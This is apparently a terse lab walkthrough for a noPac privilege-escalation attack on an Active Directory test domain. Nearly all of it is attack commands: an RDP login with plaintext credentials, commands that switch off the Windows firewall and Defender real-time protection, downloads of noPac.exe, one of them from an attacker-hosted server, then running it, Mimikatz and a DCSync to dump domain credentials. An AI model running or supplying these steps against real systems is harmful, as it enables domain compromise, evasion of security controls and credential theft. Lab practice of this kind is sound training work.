From Windows With noPAC.exe
RDP to NYC
xfreerdp /d:newyork.local /u:mateo.pacheco /p:'elsenorpacheco' /v:192.168.56.10 /size:80% /cert-ignoredisable firewall and defender
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
#disable defender
Set-MpPreference -DisableRealtimeMonitoring $trueDownload noPac.exe
wget https://github.com/TryA9ain/noPac/releases/download/v1.0/noPac.exeUpload noPac.exe
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/noPac.exe', 'C:\Users\mateo.pacheco\desktop\noPac.exe')
Upload Mimikatz
Execute noPac.exe

dcsync with mimikatz
Last updated